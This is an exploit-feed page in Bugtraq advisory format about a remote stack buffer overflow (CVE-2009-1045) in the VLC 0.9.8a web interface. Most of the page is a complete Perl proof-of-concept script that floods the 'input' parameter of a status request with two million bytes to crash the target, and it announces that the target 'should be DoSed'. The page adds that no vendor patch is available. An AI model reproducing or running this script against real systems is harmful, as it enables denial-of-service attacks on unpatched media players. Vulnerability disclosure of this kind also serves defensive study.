|
Feeds -
Exploits
|
|
Written by TheLeader
|
|
Monday, 30 March 2009 22:06 |
VLC Media Player Web Interface 'input' Parameter Remote Buffer Overflow Vulnerability
-\\Bugtraq ID: 34126
-\\Class: Boundary Condition Error
-\\CVE: CVE-2009-1045
-\\Remote: Yes
-\\Local: No
-\\Published: Mar 16 2009 12:00AM
-\\Updated: Mar 30 2009 04:36PM
-\\Credit: TheLeader
-\\Vulnerable: VideoLAN VLC media player 0.9.8a
-\\Discussion VLC Media Player is prone to a remote stack-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
Attackers could exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely cause denial-of-service conditions.
VLC Media Player 0.9.8a is vulnerable; other versions may also be affected.
-\\Exploit(s)/PoC(s): The following proof of concept is available:
=============================================================== 34126.pl ^^^^^^^^^ #!/usr/bin/perl
######################################################## ## VLC 0.9.8a Web UI Remote Stack Overflow (DoS) by TheLeader ## GreetZ: forums.hacking.org.il ## TiP oF TEh DaY: Rock on! =] ########################################################
use IO::Socket;
my $host = shift || 'www.example.com'; # Target host my $port = shift || 8080; # Target port. Default port = 8080
#Note: for some reason, A x 2070785 = terminate without crash; my $req = "GET /requests/status.xml?command=in_play&input=" . "A" x 2000000 . " HTTP/1.1\r\n"; $req .= "Host: $host:$port\r\n"; $req .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; he; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7 (.NET CLR 3.5.30729)\r\n"; $req .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"; $req .= "Accept-Language: he,en-US;q=0.7,en;q=0.3\r\n"; $req .= "Accept-Encoding: gzip,deflate\r\n"; $req .= "Accept-Charset: windows-1255,utf-8;q=0.7,*;q=0.7\r\n"; $req .= "Keep-Alive: 300\r\n"; $req .= "Connection: keep-alive\r\n"; $req .= "Referer: http://$host:$port/\r\n\r\n";
print "\nConnecting to $host on port $port\n";
my $sock = new IO::Socket::INET( PeerAddr => $host, PeerPort => $port, Proto => 'tcp'); $sock or die "Cannot connect to server: $!"; print "Sending HTTP request..\n"; print $sock $req; print "Exploited. Target should be DoSed by now :)\n";
close $sock;
-\\Solution Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at:
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
.
-\\References(s) --VLC Homepage http://www.videolan.org (VideoLAN)
|